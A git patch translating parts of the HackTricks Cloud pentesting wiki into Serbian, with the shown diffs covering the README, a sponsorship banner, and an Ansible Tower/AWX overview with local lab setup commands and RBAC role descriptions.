From 9ce07d92a36ab384516b68a207f830112fff638d Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 31 Dec 2024 20:24:43 +0000 Subject: [PATCH] Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/ --- src/README.md | 26 +- src/SUMMARY.md | 2 + src/banners/hacktricks-training.md | 16 +- ...ower-awx-automation-controller-security.md | 130 +-- .../apache-airflow-security/README.md | 144 ++- .../airflow-configuration.md | 112 +- .../apache-airflow-security/airflow-rbac.md | 30 +- src/pentesting-ci-cd/atlantis-security.md | 276 +++-- src/pentesting-ci-cd/circleci-security.md | 298 +++-- .../cloudflare-security/README.md | 118 +- .../cloudflare-security/cloudflare-domains.md | 134 ++- .../cloudflare-zero-trust-network.md | 46 +- .../concourse-security/README.md | 18 +- .../concourse-architecture.md | 36 +- .../concourse-enumeration-and-attacks.md | 334 +++--- .../concourse-lab-creation.md | 138 +-- src/pentesting-ci-cd/gitea-security/README.md | 134 +-- .../gitea-security/basic-gitea-information.md | 116 +- .../github-security/README.md | 256 ++--- .../abusing-github-actions/README.md | 570 +++++---- .../gh-actions-artifact-poisoning.md | 7 +- .../gh-actions-cache-poisoning.md | 5 - .../gh-actions-context-script-injections.md | 7 +- .../accessible-deleted-data-in-github.md | 49 +- .../basic-github-information.md | 292 +++-- .../jenkins-security/README.md | 294 +++-- .../basic-jenkins-information.md | 90 +- ...itrary-file-read-to-rce-via-remember-me.md | 98 +- .../jenkins-dumping-secrets-from-groovy.md | 78 +- ...jenkins-rce-creating-modifying-pipeline.md | 38 +- .../jenkins-rce-creating-modifying-project.md | 28 +- .../jenkins-rce-with-groovy-script.md | 38 +- src/pentesting-ci-cd/okta-security/README.md | 112 +- .../okta-security/okta-hardening.md | 126 +- .../pentesting-ci-cd-methodology.md | 94 +- .../serverless.com-security.md | 1018 ++++++++--------- src/pentesting-ci-cd/supabase-security.md | 112 +- src/pentesting-ci-cd/terraform-security.md | 290 +++-- src/pentesting-ci-cd/todo.md | 8 +- .../travisci-security/README.md | 50 +- .../basic-travisci-information.md | 72 +- src/pentesting-ci-cd/vercel-security.md | 532 +++++---- src/pentesting-cloud/aws-security/README.md | 202 ++-- .../aws-basic-information/README.md | 378 +++--- .../aws-federation-abuse.md | 158 ++- .../aws-permissions-for-a-pentest.md | 26 +- .../aws-security/aws-persistence/README.md | 7 +- .../aws-api-gateway-persistence.md | 20 +- .../aws-cognito-persistence.md | 28 +- .../aws-dynamodb-persistence.md | 62 +- .../aws-persistence/aws-ec2-persistence.md | 48 +- .../aws-persistence/aws-ecr-persistence.md | 104 +- .../aws-persistence/aws-ecs-persistence.md | 96 +- .../aws-persistence/aws-efs-persistence.md | 14 +- .../aws-elastic-beanstalk-persistence.md | 78 +- .../aws-persistence/aws-iam-persistence.md | 50 +- .../aws-persistence/aws-kms-persistence.md | 30 +- .../aws-lambda-persistence/README.md | 52 +- .../aws-abusing-lambda-extensions.md | 30 +- .../aws-lambda-layers-persistence.md | 96 +- .../aws-lightsail-persistence.md | 30 +- .../aws-persistence/aws-rds-persistence.md | 22 +- .../aws-persistence/aws-s3-persistence.md | 16 +- .../aws-secrets-manager-persistence.md | 52 +- .../aws-persistence/aws-sns-persistence.md | 116 +- .../aws-persistence/aws-sqs-persistence.md | 42 +- .../aws-persistence/aws-ssm-perssitence.md | 5 - .../aws-step-functions-persistence.md | 14 +- .../aws-persistence/aws-sts-persistence.md | 128 +-- .../aws-post-exploitation/README.md | 5 - .../aws-api-gateway-post-exploitation.md | 78 +- .../aws-cloudfront-post-exploitation.md | 24 +- .../aws-codebuild-post-exploitation/README.md | 52 +- .../aws-codebuild-token-leakage.md | 202 ++-- .../aws-control-tower-post-exploitation.md | 10 +- .../aws-dlm-post-exploitation.md | 152 ++- .../aws-dynamodb-post-exploitation.md | 290 ++--- .../README.md | 581 +++++----- .../aws-ebs-snapshot-dump.md | 70 +- .../aws-malicious-vpc-mirror.md | 12 +- .../aws-ecr-post-exploitation.md | 54 +- .../aws-ecs-post-exploitation.md | 36 +- .../aws-efs-post-exploitation.md | 32 +- .../aws-eks-post-exploitation.md | 132 +-- ...aws-elastic-beanstalk-post-exploitation.md | 50 +- .../aws-iam-post-exploitation.md | 100 +- .../aws-kms-post-exploitation.md | 136 +-- .../aws-lambda-post-exploitation/README.md | 14 +- .../aws-warm-lambda-persistence.md | 58 +- .../aws-lightsail-post-exploitation.md | 20 +- .../aws-organizations-post-exploitation.md | 14 +- .../aws-rds-post-exploitation.md | 58 +- .../aws-s3-post-exploitation.md | 30 +- .../aws-secrets-manager-post-exploitation.md | 42 +- .../aws-ses-post-exploitation.md | 34 +- .../aws-sns-post-exploitation.md | 46 +- .../aws-sqs-post-exploitation.md | 48 +- ...sso-and-identitystore-post-exploitation.md | 10 +- .../aws-stepfunctions-post-exploitation.md | 40 +- .../aws-sts-post-exploitation.md | 48 +- .../aws-vpn-post-exploitation.md | 6 +- .../aws-privilege-escalation/README.md | 20 +- .../aws-apigateway-privesc.md | 58 +- .../aws-chime-privesc.md | 4 - .../aws-cloudformation-privesc/README.md | 92 +- ...stack-and-cloudformation-describestacks.md | 122 +- .../aws-codebuild-privesc.md | 246 ++-- .../aws-codepipeline-privesc.md | 20 +- .../aws-codestar-privesc/README.md | 60 +- ...ateproject-codestar-associateteammember.md | 146 ++- .../iam-passrole-codestar-createproject.md | 106 +- .../aws-cognito-privesc.md | 274 ++--- .../aws-datapipeline-privesc.md | 82 +- .../aws-directory-services-privesc.md | 18 +- .../aws-dynamodb-privesc.md | 10 +- .../aws-ebs-privesc.md | 16 +- .../aws-ec2-privesc.md | 204 ++-- .../aws-ecr-privesc.md | 108 +- .../aws-ecs-privesc.md | 230 ++-- .../aws-efs-privesc.md | 90 +- .../aws-elastic-beanstalk-privesc.md | 140 +-- .../aws-emr-privesc.md | 44 +- .../aws-privilege-escalation/aws-gamelift.md | 10 +- .../aws-glue-privesc.md | 48 +- .../aws-iam-privesc.md | 192 ++-- .../aws-kms-privesc.md | 124 +- .../aws-lambda-privesc.md | 214 ++-- .../aws-lightsail-privesc.md | 110 +- .../aws-mediapackage-privesc.md | 12 +- .../aws-mq-privesc.md | 26 +- .../aws-msk-privesc.md | 14 +- .../aws-organizations-prinvesc.md | 14 +- .../aws-rds-privesc.md | 112 +- .../aws-redshift-privesc.md | 48 +- .../aws-s3-privesc.md | 222 ++-- .../aws-sagemaker-privesc.md | 82 +- .../aws-secrets-manager-privesc.md | 40 +- .../aws-sns-privesc.md | 24 +- .../aws-sqs-privesc.md | 26 +- .../aws-ssm-privesc.md | 72 +- .../aws-sso-and-identitystore-privesc.md | 78 +- .../aws-stepfunctions-privesc.md | 280 ++--- .../aws-sts-privesc.md | 122 +- .../aws-workdocs-privesc.md | 26 +- .../eventbridgescheduler-privesc.md | 46 +- ...acm-pca-issuecertificate-acm-pca-getcer.md | 26 +- .../aws-security/aws-services/README.md | 42 +- .../aws-services/aws-api-gateway-enum.md | 174 ++- ...m-and-private-certificate-authority-pca.md | 18 +- .../aws-cloudformation-and-codestar-enum.md | 22 +- .../aws-services/aws-cloudfront-enum.md | 20 +- .../aws-services/aws-cloudhsm-enum.md | 72 +- .../aws-services/aws-codebuild-enum.md | 32 +- .../aws-services/aws-cognito-enum/README.md | 30 +- .../cognito-identity-pools.md | 126 +- .../aws-cognito-enum/cognito-user-pools.md | 436 ++++--- ...e-codepipeline-codebuild-and-codecommit.md | 38 +- .../aws-directory-services-workdocs-enum.md | 46 +- .../aws-services/aws-documentdb-enum.md | 10 +- .../aws-services/aws-dynamodb-enum.md | 100 +- .../README.md | 148 ++- .../aws-nitro-enum.md | 174 ++- ...ws-vpc-and-networking-basic-information.md | 204 ++-- .../aws-security/aws-services/aws-ecr-enum.md | 66 +- .../aws-security/aws-services/aws-ecs-enum.md | 50 +- .../aws-security/aws-services/aws-efs-enum.md | 96 +- .../aws-security/aws-services/aws-eks-enum.md | 18 +- .../aws-elastic-beanstalk-enum.md | 76 +- .../aws-services/aws-elasticache.md | 8 +- .../aws-security/aws-services/aws-emr-enum.md | 50 +- .../aws-security/aws-services/aws-iam-enum.md | 126 +- .../aws-kinesis-data-firehose-enum.md | 18 +- .../aws-security/aws-services/aws-kms-enum.md | 146 ++- .../aws-services/aws-lambda-enum.md | 99 +- .../aws-services/aws-lightsail-enum.md | 18 +- .../aws-security/aws-services/aws-mq-enum.md | 38 +- .../aws-security/aws-services/aws-msk-enum.md | 28 +- .../aws-services/aws-organizations-enum.md | 24 +- .../aws-services/aws-other-services-enum.md | 14 +- .../aws-services/aws-redshift-enum.md | 40 +- .../aws-relational-database-rds-enum.md | 100 +- .../aws-services/aws-route53-enum.md | 14 +- .../aws-s3-athena-and-glacier-enum.md | 250 ++-- .../aws-services/aws-secrets-manager-enum.md | 22 +- .../README.md | 7 +- .../aws-cloudtrail-enum.md | 222 ++-- .../aws-cloudwatch-enum.md | 378 +++--- .../aws-config-enum.md | 52 +- .../aws-control-tower-enum.md | 22 +- .../aws-cost-explorer-enum.md | 16 +- .../aws-detective-enum.md | 8 +- .../aws-firewall-manager-enum.md | 204 ++-- .../aws-guardduty-enum.md | 130 +-- .../aws-inspector-enum.md | 268 ++--- .../aws-macie-enum.md | 82 +- .../aws-security-hub-enum.md | 30 +- .../aws-shield-enum.md | 12 +- .../aws-trusted-advisor-enum.md | 80 +- .../aws-waf-enum.md | 400 +++---- .../aws-security/aws-services/aws-ses-enum.md | 42 +- .../aws-security/aws-services/aws-sns-enum.md | 50 +- .../aws-services/aws-sqs-and-sns-enum.md | 20 +- .../aws-services/aws-stepfunctions-enum.md | 364 +++--- .../aws-security/aws-services/aws-sts-enum.md | 74 +- .../aws-services/eventbridgescheduler-enum.md | 40 +- .../aws-unauthenticated-enum-access/README.md | 66 +- .../aws-accounts-unauthenticated-enum.md | 26 +- .../aws-api-gateway-unauthenticated-enum.md | 38 +- .../aws-cloudfront-unauthenticated-enum.md | 8 +- .../aws-codebuild-unauthenticated-access.md | 22 +- .../aws-cognito-unauthenticated-enum.md | 32 +- .../aws-documentdb-enum.md | 8 +- .../aws-dynamodb-unauthenticated-access.md | 10 +- .../aws-ec2-unauthenticated-enum.md | 30 +- .../aws-ecr-unauthenticated-enum.md | 20 +- .../aws-ecs-unauthenticated-enum.md | 14 +- ...-elastic-beanstalk-unauthenticated-enum.md | 30 +- .../aws-elasticsearch-unauthenticated-enum.md | 8 +- .../aws-iam-and-sts-unauthenticated-enum.md | 188 ++- ...ity-center-and-sso-unauthenticated-enum.md | 88 +- .../aws-iot-unauthenticated-enum.md | 8 +- .../aws-kinesis-video-unauthenticated-enum.md | 8 +- .../aws-lambda-unauthenticated-access.md | 22 +- .../aws-media-unauthenticated-enum.md | 8 +- .../aws-mq-unauthenticated-enum.md | 16 +- .../aws-msk-unauthenticated-enum.md | 14 +- .../aws-rds-unauthenticated-enum.md | 22 +- .../aws-redshift-unauthenticated-enum.md | 8 +- .../aws-s3-unauthenticated-enum.md | 170 ++- .../aws-sns-unauthenticated-enum.md | 14 +- .../aws-sqs-unauthenticated-enum.md | 16 +- src/pentesting-cloud/azure-security/README.md | 128 +-- .../az-basic-information/README.md | 482 ++++---- .../az-tokens-and-public-applications.md | 196 ++-- .../azure-security/az-device-registration.md | 66 +- .../azure-security/az-enumeration-tools.md | 78 +- .../az-arc-vulnerable-gpo-deploy-script.md | 42 +- .../az-local-cloud-credentials.md | 44 +- .../az-pass-the-certificate.md | 32 +- .../az-pass-the-cookie.md | 22 +- ...g-primary-refresh-token-microsoft-entra.md | 6 +- .../az-primary-refresh-token-prt.md | 6 +- .../az-processes-memory-access-token.md | 20 +- .../az-permissions-for-a-pentest.md | 6 +- .../pentesting-cloud-methodology.md | 208 ++-- 245 files changed, 9883 insertions(+), 12659 deletions(-) diff --git a/src/README.md b/src/README.md index 01b146fd1..bdcd806c2 100644 --- a/src/README.md +++ b/src/README.md @@ -6,35 +6,31 @@ Reading time: {{ #reading_time }}
-_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks logotipi & animacije dizajnirao_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ > [!TIP] -> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. +> Dobrodošli na stranicu gde ćete pronaći svaki **hacking trik/tehniku/šta god vezano za CI/CD & Cloud** koju sam naučio u **CTF-ovima**, **pravim** životnim **okruženjima**, **istražujući**, i **čitajuci** istraživanja i vesti. -### **Pentesting CI/CD Methodology** +### **Pentesting CI/CD Metodologija** -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** +**U HackTricks CI/CD Metodologiji ćete pronaći kako da pentestujete infrastrukturu vezanu za CI/CD aktivnosti.** Pročitajte sledeću stranicu za **uvod:** [pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -### Pentesting Cloud Methodology +### Pentesting Cloud Metodologija -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** +**U HackTricks Cloud Metodologiji ćete pronaći kako da pentestujete cloud okruženja.** Pročitajte sledeću stranicu za **uvod:** [pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) -### License & Disclaimer +### Licenca & Odricanje -**Check them in:** +**Proverite ih u:** -[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) +[HackTricks Vrednosti & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) -### Github Stats +### Github Statistika -![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) +![HackTricks Cloud Github Statistika](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) {{#include ./banners/hacktricks-training.md}} - - - - diff --git a/src/SUMMARY.md b/src/SUMMARY.md index feae5163c..1b1d60c58 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -505,3 +505,5 @@ + + diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b684cee3d..8fc60c0cd 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,17 +1,13 @@ > [!TIP] -> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> Učite i vežbajte AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> Učite i vežbajte GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) > >
> -> Support HackTricks +> Podržite HackTricks > -> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. > >
- - - - diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md index d3fbf19e5..6ce25cb73 100644 --- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md +++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md @@ -4,60 +4,59 @@ ## Basic Information -**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows. +**Ansible Tower** ili njegova open-source verzija [**AWX**](https://github.com/ansible/awx) poznata je kao **korisnički interfejs, kontrolna tabla i REST API Ansible-a**. Sa **kontrolom pristupa zasnovanom na rolama**, rasporedom poslova i grafičkim upravljanjem inventarom, možete upravljati svojom Ansible infrastrukturom iz modernog UI-a. REST API i komandna linija Tower-a olakšavaju integraciju sa trenutnim alatima i radnim tokovima. -**Automation Controller is a newer** version of Ansible Tower with more capabilities. +**Automation Controller je novija** verzija Ansible Tower-a sa više mogućnosti. ### Differences -According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows. +Prema [**ovome**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), glavne razlike između Ansible Tower-a i AWX-a su podrška koja se dobija, a Ansible Tower ima dodatne funkcije kao što su kontrola pristupa zasnovana na rolama, podrška za prilagođene API-je i korisnički definisani radni tokovi. ### Tech Stack -- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. -- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. -- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. -- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. -- **Redis**: Redis serves as a cache and a backend for the task queue. +- **Web Interface**: Ovo je grafički interfejs gde korisnici mogu upravljati inventarima, akreditivima, šablonima i poslovima. Dizajniran je da bude intuitivan i pruža vizualizacije koje pomažu u razumevanju stanja i rezultata vaših automatizovanih poslova. +- **REST API**: Sve što možete uraditi u web interfejsu, možete uraditi i putem REST API-ja. To znači da možete integrisati AWX/Tower sa drugim sistemima ili skriptovati radnje koje biste obično izvodili u interfejsu. +- **Database**: AWX/Tower koristi bazu podataka (obično PostgreSQL) za čuvanje svoje konfiguracije, rezultata poslova i drugih neophodnih operativnih podataka. +- **RabbitMQ**: Ovo je sistem za razmenu poruka koji koristi AWX/Tower za komunikaciju između različitih komponenti, posebno između web servisa i izvršitelja zadataka. +- **Redis**: Redis služi kao keš i pozadinski sistem za red zadataka. ### Logical Components -- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. -- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. -- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. -- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. -- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. -- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. -- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. -- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. +- **Inventories**: Inventar je **kolekcija hostova (ili čvorova)** protiv kojih se mogu **izvršavati poslovi** (Ansible playbook-ovi). AWX/Tower vam omogućava da definišete i grupišete svoje inventare i takođe podržava dinamične inventare koji mogu **pribaviti liste hostova iz drugih sistema** kao što su AWS, Azure, itd. +- **Projects**: Projekat je u suštini **kolekcija Ansible playbook-ova** preuzetih iz **sistema za kontrolu verzija** (kao što je Git) kako bi se povukli najnoviji playbook-ovi kada je to potrebno. +- **Templates**: Šabloni poslova definišu **kako će se određeni playbook izvršiti**, specificirajući **inventar**, **akreditive** i druge **parametre** za posao. +- **Credentials**: AWX/Tower pruža siguran način za **upravljanje i čuvanje tajni, kao što su SSH ključevi, lozinke i API tokeni**. Ovi akreditivi mogu biti povezani sa šablonima poslova kako bi playbook-ovi imali neophodan pristup kada se izvršavaju. +- **Task Engine**: Ovo je mesto gde se dešava magija. Task engine je izgrađen na Ansible-u i odgovoran je za **izvršavanje playbook-ova**. Poslovi se šalju task engine-u, koji zatim izvršava Ansible playbook-ove protiv određenog inventara koristeći specificirane akreditive. +- **Schedulers and Callbacks**: Ovo su napredne funkcije u AWX/Tower koje omogućavaju **raspoređivanje poslova** da se izvršavaju u određenim vremenima ili da budu pokrenuti spoljnim događajima. +- **Notifications**: AWX/Tower može slati obaveštenja na osnovu uspeha ili neuspeha poslova. Podržava različite načine obaveštavanja kao što su e-mailovi, Slack poruke, webhook-ovi, itd. +- **Ansible Playbooks**: Ansible playbook-ovi su alati za konfiguraciju, implementaciju i orkestraciju. Oni opisuju željeno stanje sistema na automatizovan, ponovljiv način. Napisani u YAML-u, playbook-ovi koriste Ansible-ov deklarativni jezik automatizacije za opisivanje konfiguracija, zadataka i koraka koji treba da se izvrše. ### Job Execution Flow -1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. +1. **User Interaction**: Korisnik može interagovati sa AWX/Tower ili putem **Web Interface** ili **REST API**. Ovi pružaju front-end pristup svim funkcionalnostima koje nudi AWX/Tower. 2. **Job Initiation**: - - The user, via the Web Interface or API, initiates a job based on a **Job Template**. - - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. - - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. +- Korisnik, putem Web Interface-a ili API-ja, pokreće posao na osnovu **Job Template**. +- Job Template uključuje reference na **Inventory**, **Project** (koji sadrži playbook) i **Credentials**. +- Po pokretanju posla, zahtev se šalje AWX/Tower pozadini da se posao stavi u red za izvršenje. 3. **Job Queuing**: - - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. - - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. +- **RabbitMQ** upravlja razmenom poruka između web komponente i izvršitelja zadataka. Kada se posao pokrene, poruka se šalje task engine-u koristeći RabbitMQ. +- **Redis** deluje kao pozadinski sistem za red zadataka, upravljajući redom poslova koji čekaju na izvršenje. 4. **Job Execution**: - - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. - - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. - - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. +- **Task Engine** preuzima posao iz reda. Preuzima potrebne informacije iz **Database** o povezanom playbook-u, inventaru i akreditivima. +- Koristeći preuzeti Ansible playbook iz povezanog **Project**, Task Engine izvršava playbook protiv specificiranih **Inventory** čvorova koristeći date **Credentials**. +- Dok se playbook izvršava, njegov izlaz (logovi, činjenice, itd.) se beleži i čuva u **Database**. 5. **Job Results**: - - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. - - Users can then view the results through the Web Interface or query them via the REST API. - - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. +- Kada se playbook završi, rezultati (uspeh, neuspeh, logovi) se čuvaju u **Database**. +- Korisnici mogu pregledati rezultate putem Web Interface-a ili ih pretraživati putem REST API-ja. +- Na osnovu ishoda posla, **Notifications** se mogu slati kako bi obavestili korisnike ili spoljne sisteme o statusu posla. Obaveštenja mogu biti e-mailovi, Slack poruke, webhook-ovi, itd. 6. **External Systems Integration**: - - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. - - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. - - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. +- **Inventories** se mogu dinamički preuzimati iz spoljnog sistema, omogućavajući AWX/Tower da povuče hostove iz izvora kao što su AWS, Azure, VMware i drugi. +- **Projects** (playbook-ovi) mogu se preuzeti iz sistema za kontrolu verzija, osiguravajući korišćenje ažuriranih playbook-ova tokom izvršenja posla. +- **Schedulers and Callbacks** mogu se koristiti za integraciju sa drugim sistemima ili alatima, omogućavajući AWX/Tower da reaguje na spoljne okidače ili izvršava poslove u unapred određenim vremenima. ### AWX lab creation for testing -[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: - +[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) moguće je koristiti docker-compose za pokretanje AWX: ```bash git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version @@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser # Load demo data docker exec tools_awx_1 awx-manage create_preload_data ``` - ## RBAC ### Supported roles -The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**. +Najprivilegovanija uloga se zove **System Administrator**. Svako ko ima ovu ulogu može **modifikovati bilo šta**. -From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one. +Iz **white box security** pregleda, potrebna vam je **System Auditor role**, koja omogućava **pregled svih podataka sistema** ali ne može da pravi nikakve promene. Druga opcija bi bila da dobijete **Organization Auditor role**, ali bi bilo bolje da dobijete onu prvu.
Expand this to get detailed description of available roles 1. **System Administrator**: - - This is the superuser role with permissions to access and modify any resource in the system. - - They can manage all organizations, teams, projects, inventories, job templates, etc. +- Ovo je superuser uloga sa dozvolama za pristup i modifikaciju bilo kog resursa u sistemu. +- Mogu upravljati svim organizacijama, timovima, projektima, inventarima, šablonima poslova, itd. 2. **System Auditor**: - - Users with this role can view all system data but cannot make any changes. - - This role is designed for compliance and oversight. +- Korisnici sa ovom ulogom mogu da vide sve podatke sistema, ali ne mogu da prave nikakve promene. +- Ova uloga je dizajnirana za usklađenost i nadzor. 3. **Organization Roles**: - - **Admin**: Full control over the organization's resources. - - **Auditor**: View-only access to the organization's resources. - - **Member**: Basic membership in an organization without any specific permissions. - - **Execute**: Can run job templates within the organization. - - **Read**: Can view the organization’s resources. +- **Admin**: Potpuna kontrola nad resursima organizacije. +- **Auditor**: Pristup samo za pregled resursa organizacije. +- **Member**: Osnovno članstvo u organizaciji bez specifičnih dozvola. +- **Execute**: Može pokretati šablone poslova unutar organizacije. +- **Read**: Može pregledati resurse organizacije. 4. **Project Roles**: - - **Admin**: Can manage and modify the project. - - **Use**: Can use the project in a job template. - - **Update**: Can update project using SCM (source control). +- **Admin**: Može upravljati i modifikovati projekat. +- **Use**: Može koristiti projekat u šablonu posla. +- **Update**: Može ažurirati projekat koristeći SCM (source control). 5. **Inventory Roles**: - - **Admin**: Can manage and modify the inventory. - - **Ad Hoc**: Can run ad hoc commands on the inventory. - - **Update**: Can update the inventory source. - - **Use**: Can use the inventory in a job template. - - **Read**: View-only access. +- **Admin**: Može upravljati i modifikovati inventar. +- **Ad Hoc**: Može pokretati ad hoc komande na inventaru. +- **Update**: Može ažurirati izvor inventara. +- **Use**: Može koristiti inventar u šablonu posla. +- **Read**: Pristup samo za pregled. 6. **Job Template Roles**: - - **Admin**: Can manage and modify the job template. - - **Execute**: Can run the job. - - **Read**: View-only access. +- **Admin**: Može upravljati i modifikovati šablon posla. +- **Execute**: Može pokrenuti posao. +- **Read**: Pristup samo za pregled. 7. **Credential Roles**: - - **Admin**: Can manage and modify the credentials. - - **Use**: Can use the credentials in job templates or other relevant resources. - - **Read**: View-only access. +- **Admin**: Može upravljati i modifikovati akreditive. +- **Use**: Može koristiti akreditive u šablonima poslova ili drugim relevantnim resursima. +- **Read**: Pristup samo za pregled. 8. **Team Roles**: - - **Member**: Part of the team but without any specific permissions. - - **Admin**: Can manage the team's members and associated resources. +- **Member**: Deo tima, ali bez specifičnih dozvola. +- **Admin**: Može upravljati članovima tima i povezanim resursima. 9. **Workflow Roles**: - - **Admin**: Can manage and modify the workflow. - - **Execute**: Can run the workflow. - - **Read**: View-only access. +- **Admin**: Može upravljati i modifikovati tok rada. +- **Execute**: Može pokrenuti tok rada. +- **Read**: Pristup samo za pregled.
